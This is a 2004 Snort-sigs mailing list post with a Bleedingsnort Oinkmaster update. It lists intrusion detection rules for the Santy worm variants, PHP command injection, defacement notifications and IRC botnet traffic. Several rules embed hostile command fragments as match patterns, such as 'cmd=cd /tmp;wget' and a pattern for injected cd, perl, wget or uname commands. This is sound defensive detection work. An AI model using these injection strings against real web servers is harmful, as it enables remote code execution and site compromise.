[Snort-sigs] Bleedingsnort.com Daily Update

bleeding at ...2727... bleeding at ...2727...
Sat Dec 25 18:01:01 EST 2004


[***] Results from Oinkmaster started Sat Dec 25 21:00:03 2004 [***]

[+++]          Added rules:          [+++]

     -> Added to bleeding-virus.rules (4):
        alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.C Outbound Attack --LOCAL INFECTION--"; uricontent:"/spy.gif?&cmd=cd /tmp\;wget"; nocase; reference:url,www.k-otik.com/exploits/20041225.SantyC.php; flow:to_server,established; sid:2001615; rev:3;)
        alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.B worm variants searching for targets"; content:"GET /search|3f|"; nocase; content: "q=inurl|3a|"; nocase; content:".php|3f|"; nocase; within:10; pcre:"/&start=\d+/i"; classtype: trojan-activity; flow:to_server,established; sid:2001618; rev:2;)
        alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.C Inbound Attack"; uricontent:"/spy.gif?&cmd=cd /tmp\;wget"; nocase; reference:url,www.k-otik.com/exploits/20041225.SantyC.php; flow:to_server,established; sid:2001614; rev:3;)
        alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:"BLEEDING-EDGE Virus Santy.B worm variants searching for targets"; content:"GET /search|3f|q=inurl|3a2a|.php|3f2a|="; nocase; pcre:"/\d+&start=\d+/iR"; classtype: trojan-activity; flow:to_server,established; sid:2001617; rev:2;)

     -> Added to bleeding.rules (3):
        alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS (msg: "BLEEDING-EDGE Exploit Suspected PHP Injection Attack"; content: "GET /"; nocase; content: ".php|3f|"; nocase; within: 64; pcre: "/(name=http|cmd=.*(cd|perl|wget|id|uname|t?ftp))/i"; flow:to_server,established; classtype: trojan-activity; sid:2001621; rev:2;)
        alert tcp $HOME_NET any -> 213.219.122.11/32 $HTTP_PORTS (msg:"BLEEDING-EDGE Attack Response Zone-H.org defacement notification"; pcre: "/notify_(defacer|domain|hackmode|reason)=/i"; flow:established,to_server; classtype: trojan-activity; sid:2001616; rev:3;)
        alert tcp $HOME_NET any -> any 6667 (msg:"BLEEDING-EDGE Attack Response Likely Botnet Activity"; tag:session,50,packets; content: "PRIVMSG"; nocase; pcre:"/(cheguei gazelas|meh que tao|Status|Tempo|Total pacotes|Total bytes|M?dia de envio|portas? aberta)/i"; classtype: string-detect; flow:to_server,established; sid:2001620; rev:2;)

[///]     Modified active rules:     [///]

     -> Modified active in bleeding-virus.rules (1):
        old: alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg: "BLEEDING-EDGE Virus Possible santy.A Worm Defaced Page"; content:"This site is defaced!!!"; nocase; content:"NeverEverNoSanity WebWorm generation X"; nocase; reference:url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html; sid:2001607; rev:1;)
        new: alert tcp $HOME_NET $HTTP_PORTS -> $EXTERNAL_NET any (msg: "BLEEDING-EDGE Virus Possible santy.A Worm Defaced Page"; content:"This site is defaced!!!"; nocase; content:"NeverEverNoSanity WebWorm generation X"; nocase; reference:url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html; flow:from_server,established; sid:2001607; rev:2;)

[---]         Removed rules:         [---]

     -> Removed from bleeding-virus.rules (1):
        alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg: "BLEEDING-EDGE Virus Possible Santy.A Worm Searching Google for Targets"; uricontent:"&q=allinurl%3A+%22viewtopic.php%22+%22"; nocase; reference:url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html; sid:2001606; rev:1;)

[+++]      Added non-rule lines:     [+++]

     -> Added to bleeding-sid-msg.map (7):
        2001614 || BLEEDING-EDGE Virus Santy.C Inbound Attack || url,www.k-otik.com/exploits/20041225.SantyC.php
        2001615 || BLEEDING-EDGE Virus Santy.C Outbound Attack --LOCAL INFECTION-- || url,www.k-otik.com/exploits/20041225.SantyC.php
        2001616 || BLEEDING-EDGE Attack Response Zone-H.org defacement notification
        2001617 || BLEEDING-EDGE Virus Santy.B worm variants searching for targets
        2001618 || BLEEDING-EDGE Virus Santy.B worm variants searching for targets
        2001620 || BLEEDING-EDGE Attack Response Likely Botnet Activity
        2001621 || BLEEDING-EDGE Exploit Suspected PHP Injection Attack

     -> Added to bleeding-virus.rules (3):
        #By Erik Fichtner
        alert tcp $HOME_NET any -> any $HTTP_PORTS (msg:BLEEDING-EDGE Virus Santy.B worm variants serarching for targets (yahoo)"; content:"GET /search|3f|"; nocase; content: "p=inurl|3a|"; nocase; content:".php|3f2a|="; nocase; within:10; pcre:"/\d+/iR"; content:"&ei=UTF-8&fl=0&all=1&pstart=1&b="; nocase; pcre:"/\d+/iR"; flow:to_server,established; classtype: trojan-activity; sid:2001619; rev:1;)
        #Matt Jonkman for .C

     -> Added to bleeding.rules (2):
        #Erik Fichtner
        #By Erik Fichtner

[---]     Removed non-rule lines:    [---]

     -> Removed from bleeding-sid-msg.map (1):
        2001606 || BLEEDING-EDGE Virus Possible Santy.A Worm Searching Google for Targets || url,securityresponse.symantec.com/avcenter/venc/data/perl.santy.html

[*] Added files: [*]
    None.





More information about the Snort-sigs mailing list